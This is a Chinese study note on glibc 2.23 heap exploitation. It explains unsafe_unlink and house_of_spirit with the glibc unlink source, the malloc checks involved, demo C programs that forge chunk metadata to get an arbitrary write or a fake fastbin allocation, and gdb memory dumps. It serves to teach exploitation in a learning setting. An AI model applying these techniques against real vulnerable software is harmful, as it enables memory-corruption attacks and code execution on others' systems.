Ubuntu16.04
glibc2.23

unsafe_unlink

Exploiting free on a corrupted chunk to get arbitrary write

unlink分析

正常的unlink目的是把一个处于双向链表中的空闲块拿出来
free当前堆块，分别判断前后的chunk是否处于空闲，若处于空闲则进行合并，执行unlink

unlink的具体步骤

#define unlink(P, BK, FD) {
    FD = P->fd;
    BK = P->bk;
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))      //检查        
      malloc_printerr (check_action, "corrupted double-linked list", P);
    else {
        FD->bk = BK;
        BK->fd = FD; [*]
        if (!in_smallbin_range (P->size) //下面的步骤对于small chunk不涉及
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {
            assert (P->fd_nextsize->bk_nextsize == P);
            assert (P->bk_nextsize->fd_nextsize == P);
            if (FD->fd_nextsize == NULL) {
                if (P->fd_nextsize == P)
                  FD->fd_nextsize = FD->bk_nextsize = FD;
                else {
                    FD->fd_nextsize = P->fd_nextsize;
                    FD->bk_nextsize = P->bk_nextsize;
                    P->fd_nextsize->bk_nextsize = FD;
                    P->bk_nextsize->fd_nextsize = FD;
                  }
              } else {
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;
              }
          }
      }
}

相应的检查：

// 由于 P 已经在双向链表中，所以有两个地方记录其大小，所以检查一下其大小是否一致(size检查)
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
      malloc_printerr ("corrupted size vs. prev_size");
// 检查 fd 和 bk 指针(双向链表完整性检查)
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
  malloc_printerr (check_action, "corrupted double-linked list", P, AV); 
// largebin 中 next_size 双向链表完整性检查 
              if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)
                || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))
              malloc_printerr (check_action,
                               "corrupted double-linked list (not small)",
                               P, AV);

示例代码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>

uint64_t *chunk0_ptr;
//chunk0_ptr is at 0x602078
int main()
{
	setbuf(stdout, NULL);
	printf("Welcome to unsafe unlink 2.0!\n");
	printf("Tested in Ubuntu 14.04/16.04 64bit.\n");
	printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
	printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");

	int malloc_size = 0x80; //we want to be big enough not to use fastbins
	int header_size = 2;

	printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");

	chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
	uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
	printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
	printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);

	printf("We create a fake chunk inside chunk0.\n");
	printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
	chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
	printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
	printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
	chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
	printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
	printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);

	printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
	uint64_t *chunk1_hdr = chunk1_ptr - header_size;
	printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
	printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
	chunk1_hdr[0] = malloc_size;
	printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
	printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
	chunk1_hdr[1] &= ~1;

	printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
	printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
	free(chunk1_ptr);

	printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
	char victim_string[8];
	strcpy(victim_string,"Hello!~");
	chunk0_ptr[3] = (uint64_t) victim_string;

	printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
	printf("Original value: %s\n",victim_string);
	chunk0_ptr[0] = 0x4141414142424242LL;
	printf("New Value: %s\n",victim_string);

	// sanity check
	assert(*(long *)victim_string == 0x4141414142424242L);
}

触发条件：

存在位于bss段的指针指向一个堆
拥有堆溢出的漏洞

步骤：

bss段上存放着指向chunk0的指针（大小为small chunk，要位于双向链表中）
申请一个chunk1位于chunk0后面，地址0x602078处存放着指向chunk0的指针。此时我们在chunk0里面伪造fd和bk，使fd指向0x602078-0x18，bk指向0x602078-0x10处，这样在索引的时候恰好使其FD的bk指向自己，BK的fd也指向自己，满足检查if (__builtin_expect (FD->bk != P || BK->fd != P, 0))。同时修改chunk1的pre_size位和pre_inuse位，pre_size位与伪造的fd和bk对应的堆大小要对应
free chunk1，执行FD->bk = BK; BK->fd = FD;，则地址0x602078处原本指向chunk0的指针被改写指向0x602078-0x18，由此我们已经可以控制指针指向任意地址

示例程序里在栈上存了一个字符串，然后让指针指向栈上存放字符串的地址，成功修改了字符串的数据，也就是实现了任意地址写

（示例程序中伪造后的样子）

gef➤  x/40gx 0x603010-0x10
0x603000:	0x0000000000000000	0x0000000000000091 ->chunk0
0x603010:	0x0000000000000000	0x0000000000000000
0x603020:	0x0000000000602060	0x0000000000602068 ->fake fd&fake bk
0x603030:	0x0000000000000000	0x0000000000000000
0x603040:	0x0000000000000000	0x0000000000000000
0x603050:	0x0000000000000000	0x0000000000000000
0x603060:	0x0000000000000000	0x0000000000000000
0x603070:	0x0000000000000000	0x0000000000000000
0x603080:	0x0000000000000000	0x0000000000000000
0x603090:	0x0000000000000080	0x0000000000000090 ->chunk1
0x6030a0:	0x0000000000000000	0x0000000000000000
0x6030b0:	0x0000000000000000	0x0000000000000000

house_of_spirit

Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer

思路

核心原理是通过free一个伪造的chunk来控制本来无法读写的区域
关键在于free前要控制chunk的size和下一个chunk的size的值
想要让伪造的chunk被成功释放并放入fastbin中，需要绕过一些检测

fake chunk的ISMMAP位不能为1（mmap的chunk在free时单独处理）
fake chunk地址需要对齐
fake chunk的size大小要满足fastbin要求，同时也要对齐
fake chunk的next chunk大小应大于2*ISZE_SZ并小于av->system_mem
fake chunk对应的fastbin链表头部不能是该chunk（否则double free异常）

house_of_spirit的想法在于我们想要控制的区域控制不了，但它前面和后面都可以控制，所以伪造好数据将它释放到fastbin里面，后面将该内存区域当做堆块申请出来，致使该区域被当做普通的内存使用，从而目标区域就变成了可控的了

示例代码

#include <stdio.h>
#include <stdlib.h>

int main()
{
	fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

	fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
	malloc(1);

	fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
	unsigned long long *a;
	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

	fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);

	fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
	fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
	fake_chunks[1] = 0x40; // this is the size

	fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
        // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
	fake_chunks[9] = 0x1234; // nextsize

	fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
	fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
	a = &fake_chunks[2];

	fprintf(stderr, "Freeing the overwritten pointer.\n");
	free(a);

	fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
	fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

在栈上把相应值伪造好后如下所示

pwndbg> x/20gx 0x7fffffffdc68-0x8
0x7fffffffdc60:	0x0000000000000001	0x0000000000000040 ->size
0x7fffffffdc70:	0x00007ffff7ffe168	0x0000000000000000
0x7fffffffdc80:	0x0000000000000001	0x00000000004008ed
0x7fffffffdc90:	0x0000000000000000	0x0000000000000000
0x7fffffffdca0:	0x00000000004008a0	0x0000000000001234 ->next size
0x7fffffffdcb0:	0x00007fffffffdda0	0x874c13b92e793d00

然后让指针指向0x7fffffffdc70，free，伪造的chunk就被放入fastbin中了

────────────────────────────── Fastbins for arena 0x7ffff7dd1b20 ──────────────────────────────
Fastbins[idx=0, size=0x20] 0x00
Fastbins[idx=1, size=0x30] 0x00
Fastbins[idx=2, size=0x40]  ←  Chunk(addr=0x7fffffffdc70, size=0x40, flags=) 
Fastbins[idx=3, size=0x50] 0x00
Fastbins[idx=4, size=0x60] 0x00
Fastbins[idx=5, size=0x70] 0x00
Fastbins[idx=6, size=0x80] 0x00